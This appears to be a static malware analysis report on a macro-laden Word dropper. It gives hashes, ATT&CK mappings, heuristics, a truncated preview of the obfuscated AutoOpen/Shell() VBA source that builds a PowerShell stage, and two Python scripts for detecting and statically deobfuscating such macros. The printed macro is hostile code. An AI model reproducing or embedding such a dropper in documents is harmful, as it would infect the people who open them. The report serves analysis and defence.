Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 65db58efa397a4b2…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 209.5 KB
Created: 2018-06-27 05:34:00
Authoring application: Microsoft Office Word
First seen: 2018-07-27
MD5: 861ff265263f145214a8e59e26dfd226
SHA-1: 053de2d30fe7bb2aec4c3db94e169a5b8a3d8ea7
SHA-256: 65db58efa397a4b279fd53643fb5e81cbf8cb75e583201b46f2a1b7dee2211fd
Risk score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File

The sample is a Word (OLE) document carrying a VBA project with an AutoOpen entry point, so the macro runs as soon as the document is opened with macros enabled. The project uses a Shell() call, which hands the string it receives to the operating system as a command line. The recovered source builds that string from dozens of short literal fragments and Chr() calls, interleaved with padding assignments (Sin(), CDate(), unused integers) that exist only to bulk out and disguise the code. The fragments visibly assemble a PowerShell expression ("Hell  [StriNG]::JOIn('',( '56W84c..." in the preview below) followed by a long list of delimiter-separated decimal values, the usual shape of a stage that decodes an embedded string and, most likely, downloads and runs a second-stage payload. The full command and any URL in it are only recoverable by resolving the concatenation, and the preview on this page is truncated. The ClamAV signature hit (Doc.Dropper.Agent-6592983-0) independently supports the verdict.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6592983-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6592983-0
  • VBA macros detected [medium] OLE_VBA_MACROS (3 related findings)
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    The VBA project calls Shell(), which passes a command line to the operating system for execution; this is the macro's execution primitive.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    The project defines an AutoOpen entry point, so the code runs as soon as a user opens the document with macros enabled, with no further interaction.
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. For this sample a VBA project was in fact recovered (macros.bas below), so the marker most likely reflects the same AutoOpen entry point seen by a second, source-independent check rather than a separate WordBasic macro.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the DrawingML XML namespace URI that Office writes into ordinary documents; it is not a download location and adds nothing to the verdict.
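The OLE_VBA_PCODE_AUTOEXEC_EXEC finding above fires on compiled VBA or cache streams rather than on decoded source, so it has to work on raw bytes. The check below is an added illustration of that logic, not the platform's implementation: it looks for an auto-execution name together with an execution, download or object-creation name, in both ASCII and UTF-16LE so that identifier tables in either encoding are caught, and reports which tokens matched so an analyst can judge the hit. The token lists and the two constructed sample streams are assumptions of this example.

```python
"""Auto-exec + execution token co-occurrence over raw VBA stream bytes."""

# Token lists are this example's assumptions, not the platform's rule set.
AUTOEXEC_TOKENS = ["AutoOpen", "AutoExec", "AutoClose", "Auto_Open",
                   "Document_Open", "Workbook_Open"]
EXEC_TOKENS = ["Shell", "WScript.Shell", "CreateObject", "GetObject",
               "ShellExecute", "URLDownloadToFile", "XMLHTTP", "powershell"]


def find_tokens(data, tokens):
    """Return sorted (token, encoding) pairs present in the byte stream.
    bytes.lower() folds ASCII letters only, which is all the match needs in
    either encoding. Substring hits are accepted on purpose: recall first,
    the analyst confirms."""
    hay = data.lower()
    hits = set()
    for t in tokens:
        low = t.lower()
        if low.encode("ascii") in hay:
            hits.add((t, "ascii"))
        if low.encode("utf-16-le") in hay:
            hits.add((t, "utf-16le"))
    return sorted(hits)


def pcode_autoexec_exec(data):
    """Mirror of the heuristic: hit when an auto-exec token and at least one
    execution token both occur. Returns (verdict, auto_hits, exec_hits)."""
    auto = find_tokens(data, AUTOEXEC_TOKENS)
    exe = find_tokens(data, EXEC_TOKENS)
    return (bool(auto) and bool(exe), auto, exe)


# Constructed stand-ins for a module stream whose source did not decompress:
# identifier names floating in otherwise opaque bytes (not real stream data).
SUSPICIOUS_STREAM = (b"\x01\x00\x8c\x1f" + b"AutoOpen\x00" + b"\xff" * 8
                     + "CreateObject".encode("utf-16-le") + b"\x00\x00"
                     + b"\x13\x37shell\x00")
BENIGN_STREAM = (b"\x01\x00\x8c\x1f" + b"Document_Open\x00" + b"\xde\xad"
                 + b"FormatCell\x00")

if __name__ == "__main__":
    for name, blob in (("suspicious", SUSPICIOUS_STREAM), ("benign", BENIGN_STREAM)):
        verdict, auto, exe = pcode_autoexec_exec(blob)
        print(name, "->", "HIT" if verdict else "clean", auto, exe)
```

An auto-exec name on its own (the benign stream) is not enough: event handlers such as Document_Open are common in legitimate templates, which is why the rule demands the execution token as well.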

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename   | Kind      | Source                                              | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10043 bytes
SHA-256: 217a7e926f39946bf18c53305e3702f51ee687148389da36ede559ab0a375575

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "kFlFHqORE"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "ibIYNUz"
Function QvNawscis()
On Error Resume Next
OaRiU = 86486
baiRQ = QBpvz
mkfQVK = Sin(19757)
TFhiVz = 8271
zWFlFt = CDate(9284)
XdWfz = 54363
DSVcnU = "Hell" + "  [" + "Stri" + "NG" + "]:" + ":JOI" + "n" + Chr(40) + "''," + Chr(40) + " '56W" + "84c"
Ekdza = 85388
TChZSt = MUMdiQ
lUEQup = Sin(22289)
sqiZA = 25569
okrwH = CDate(20366)
fdAMn = 42949
XZDwjfkzPSb = "85%1" + "19k33" + "N114U121" + "k107N49%" + "115~12" + "6Y11" + "8%1"
ZcPoKY = 13345
mmWmbL = zRjNaA
KMDFi = Sin(82475)
VrOzH = 34203
dYDkC = CDate(79161)
NkawR = 80135
EXtwVtm = "21%" + "127U104" + "N60U" + "82h121k1" + "04" + "W5" + "0}75}121" + "N126" + "c95k112" + "%117h"
UOXAqf = Sin(97023)
zNdAiQ = CDate(27214)
cIwJp = 67828
NLHRNR = HoTttp
aQtjkR = 29197
XOOAf = 89900
vBDvjfpXKRY = "121~" + "114~104" + "}39}56h" + "110k81" + "h75U33W" + "59}"
ZniawX = Sin(20682)
HvEwv = CDate(58200)
tCKGlK = 68400
bcfSqw = QiWTma
JwuVn = 72629
oAvJzF = 8603
LwttXKRYACR = "11" + "6~104k" + "104k" + "108c38U5" + "1k51k1" + "07}107" + "N10" + "7h50U46" + "W11" + "4N" + "12"
bpKzK = Sin(72513)
XAifq = CDate(50890)
fEzzWr = 94503
CbDvo = WhznMz
dnVPt = 70675
pFnkJl = 34898
sfLRWJDi = "0%111}1" + "27~" + "110N121}" + "121" + "h114%1" + "11h1"
DncCsi = Sin(12266)
JMvZlH = CDate(81173)
XzBwm = 88811
tBnPM = QKiuE
RjzhjZ = 75729
cznMHY = 89482
jdDYlsQ = "15" + "}127%117" + "~121W" + "104~1" + "01" + "N50~" + "127W" + "115" + "c1"
JWUUo = Sin(65195)
PXkqT = CDate(60466)
rMcRB = 85285
uocKWG = jrRhMW
llPXT = 66523
rULVJi = 52685
YAtircWBB = "13W5" + "1%77c" + "70k70W94" + "W51c92}" + "116Y104" + "c104c1"
nNHap = Sin(62666)
wXQCic = CDate(58115)
LiuNs = 65183
mGSqM = URpNX
HDuTC = 86697
iwFhL = 47489
RifGGRMuhU = "08Y38}" + "51h5" + "1%107Y1" + "07~1" + "07k5" + "0Y12" + "0~117U" + "114U1" + "23Y12" + "0~115"
XKsTmS = Sin(352)
YDwUT = CDate(81002)
JOXqf = 28542
qCliO = jYHRFQ
whWSFU = 41224
dKNFp = 72802
jOAOJBFzmU = "k114U1" + "23c120%1" + "15N123c1" + "04U" + "11" + "0W125W1"
jbAJE = Sin(21259)
tjHRl = CDate(69832)
wTwGs = 81087
bZFKjf = fsciJO
vMWOlo = 36463
sLvUl = 29301
fhjcaKrwM = "17c" + "114k117" + "U114" + "%123N5" + "0Y127N1" + "15c" + "113%51%" + "90h127%1" + "15~1" + "18c51k92"
QvNawscis = DSVcnU + XZDwjfkzPSb + EXtwVtm + vBDvjfpXKRY + LwttXKRYACR + sfLRWJDi + jdDYlsQ + YAtircWBB + RifGGRMuhU + jOAOJBFzmU + fhjcaKrwM
UHoHim = Sin(62376)
VNbfh = CDate(59043)
wQcVFD = 95334
CPiwc = jOJpzQ
Grojd = 62916
mqpGF = 91579
End Function
Function tflwoBDE()
On Error Resume Next
XWmJU = Sin(94007)
nNhzd = CDate(31048)
uCApiB = 30973
TbajI = ZopWj
STUwb = 79960
HIdXP = 51492
OWmrdV = "N116Y10" + "4%104" + "~108" + "U38W51k" + "51W107k1" + "07c1" + "07}5" + "0}11"
kYciqv = Sin(12407)
ANIMwc = CDate(29807)
BSDNP = 99368
dmvLk = LzCTi
jXEvlk = 38619
OnIiXz = 35763
znXlfN = "0h1" + "25W120Y1" + "17" + "~115Y117" + "~11" + "4h111c10" + "8U11" + "7%11" + "0%125~12" + "7N117W11" + "5k11"
kiNPiw = Sin(85330)
qcWwqz = CDate(87974)
prEvaC = 99907
luFdVD = LShbY
fvPkNU = 82523
nsmYd = 5878
kpUpGjXCQvj = "4}10" + "4~10" + "6~" + "50" + "W127c" + "115"
hZMZZt = Sin(51166)
rYutXX = CDate(59511)
TLqdzw = 27785
mRqYwB = FrAub
BqEqD = 20653
DGJKt = 56445
oUTJq = "~1" + "13~5" + "1N" + "117k84U1" + "22W7" + "9U75N" + "89k51c92" + "N116k104"
khuhwT = Sin(34059)
WrmJKq = CDate(40604)
VBqtOz = 8999
HwWjLh = EYiYS
vWJvqA = 52053
CrvYK = 27681
KhOtrOM = "}104" + "}108~3" + "8k5" + "1c5" + "1k107%1" + "07}107" + "W50k" + "113W11" + "5%115h" + "12"
pTRiS = Sin(63459)
cMYvhk = CDate(82540)
qTUEYU = 2801
AWqEFa = BSaUr
zMIZUS = 5561
puMhCw = 23578
KBhFqYPCUaE = "6W1" + "17k112}" + "121h" + "125N1" + "08c10" + "8Y50" + "h127"
DnTNT = Sin(44220)
dSWzw = CDate(79524)
CMWJr = 83921
... (truncated)
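The macro above builds its command line from short literal fragments and Chr() calls, assigned to throwaway variables and concatenated at the end of each Function; the numeric assignments are padding. The following Python script is an added example, not part of the analysis platform or of the sample: it reassembles those strings statically by walking the macro line by line, evaluating every assignment whose right-hand side yields a string, and keeping the result under the variable (or Function) name so later concatenations resolve. The embedded SAMPLE is the QvNawscis routine copied from the preview above with most padding lines dropped; the payload_tokens helper and its assumption that the number list follows the "( '" opener are this example's. What the truncated PowerShell does with those numbers is not visible on this page and is not guessed.

```python
"""Static reassembly of the string fragments the macro feeds to Shell()."""
import re
import sys

# Copied from the macros.bas preview above: the QvNawscis routine with most
# padding lines dropped (three kept to show they are ignored). Pass the path of
# the full extracted file as argv[1] to run over everything.
SAMPLE = """Function QvNawscis()
On Error Resume Next
OaRiU = 86486
baiRQ = QBpvz
mkfQVK = Sin(19757)
DSVcnU = "Hell" + "  [" + "Stri" + "NG" + "]:" + ":JOI" + "n" + Chr(40) + "''," + Chr(40) + " '56W" + "84c"
XZDwjfkzPSb = "85%1" + "19k33" + "N114U121" + "k107N49%" + "115~12" + "6Y11" + "8%1"
EXtwVtm = "21%" + "127U104" + "N60U" + "82h121k1" + "04" + "W5" + "0}75}121" + "N126" + "c95k112" + "%117h"
vBDvjfpXKRY = "121~" + "114~104" + "}39}56h" + "110k81" + "h75U33W" + "59}"
LwttXKRYACR = "11" + "6~104k" + "104k" + "108c38U5" + "1k51k1" + "07}107" + "N10" + "7h50U46" + "W11" + "4N" + "12"
sfLRWJDi = "0%111}1" + "27~" + "110N121}" + "121" + "h114%1" + "11h1"
jdDYlsQ = "15" + "}127%117" + "~121W" + "104~1" + "01" + "N50~" + "127W" + "115" + "c1"
YAtircWBB = "13W5" + "1%77c" + "70k70W94" + "W51c92}" + "116Y104" + "c104c1"
RifGGRMuhU = "08Y38}" + "51h5" + "1%107Y1" + "07~1" + "07k5" + "0Y12" + "0~117U" + "114U1" + "23Y12" + "0~115"
jOAOJBFzmU = "k114U1" + "23c120%1" + "15N123c1" + "04U" + "11" + "0W125W1"
fhjcaKrwM = "17c" + "114k117" + "U114" + "%123N5" + "0Y127N1" + "15c" + "113%51%" + "90h127%1" + "15~1" + "18c51k92"
QvNawscis = DSVcnU + XZDwjfkzPSb + EXtwVtm + vBDvjfpXKRY + LwttXKRYACR + sfLRWJDi + jdDYlsQ + YAtircWBB + RifGGRMuhU + jOAOJBFzmU + fhjcaKrwM
End Function
"""

# Terms of a VBA concatenation: "literal" ("" escapes a quote), Chr(n), a call
# such as Sin(1) or CDate(2), or a bare name. '+', '&', integers and spaces
# match nothing and are therefore skipped by finditer().
TOKEN = re.compile(
    r'"((?:[^"]|"")*)"'
    r'|Chr\$?\((\d+)\)'
    r'|([A-Za-z_]\w*)\s*\([^()]*\)'
    r'|([A-Za-z_]\w*)'
)
ASSIGN = re.compile(r'^(?:Set\s+)?([A-Za-z_]\w*)\s*=\s*(.+)$')


def eval_expr(rhs, env):
    """Evaluate one right-hand side. Returns the string it builds, or None when
    no term produced a string (the Sin()/CDate()/integer padding)."""
    parts, saw_string = [], False
    for m in TOKEN.finditer(rhs):
        lit, chr_arg, call, ident = m.groups()
        if lit is not None:
            parts.append(lit.replace('""', '"'))
            saw_string = True
        elif chr_arg is not None:
            parts.append(chr(int(chr_arg)))
            saw_string = True
        else:
            # A name resolved earlier (variable or Function return value).
            # Unknown names behave like VBA Empty, which concatenates as "";
            # Sin/CDate never land in env, so they drop out here too.
            val = env.get(call or ident)
            if val is not None:
                parts.append(val)
                saw_string = True
    return "".join(parts) if saw_string else None


def decode_macro(source):
    """Walk the macro top to bottom; return {name: string} for every variable
    or Function whose assignment yields a string. In VBA a Function's name is
    its return variable, so a later call to it resolves through env as well."""
    env = {}
    for raw in source.splitlines():
        m = ASSIGN.match(raw.strip())
        if m:
            val = eval_expr(m.group(2), env)
            if val is not None:
                env[m.group(1)] = val
    return env


def payload_tokens(decoded):
    """Assumption of this example: the decoded command has the shape seen here,
    JOIn('',( '<delimited numbers>..., so the integers after the "( '" opener
    are the payload. Their meaning is not shown on this page."""
    _, _, tail = decoded.partition("( '")
    return [int(t) for t in re.findall(r"\d+", tail)]


if __name__ == "__main__":
    path = sys.argv[1] if len(sys.argv) > 1 else None
    text = open(path, encoding="utf-8", errors="replace").read() if path else SAMPLE
    env = decode_macro(text)
    for name, value in env.items():
        print(f"{name} = {value!r}")
    print("numeric tokens:", payload_tokens(env.get("QvNawscis", ""))[:16], "...")
```

Run against the full macros.bas, the same walk resolves tflwoBDE and the other routines, and whichever assignment finally references all of them together yields the complete command line that reaches Shell(). Padding assignments never enter env, so the output is only the strings that matter.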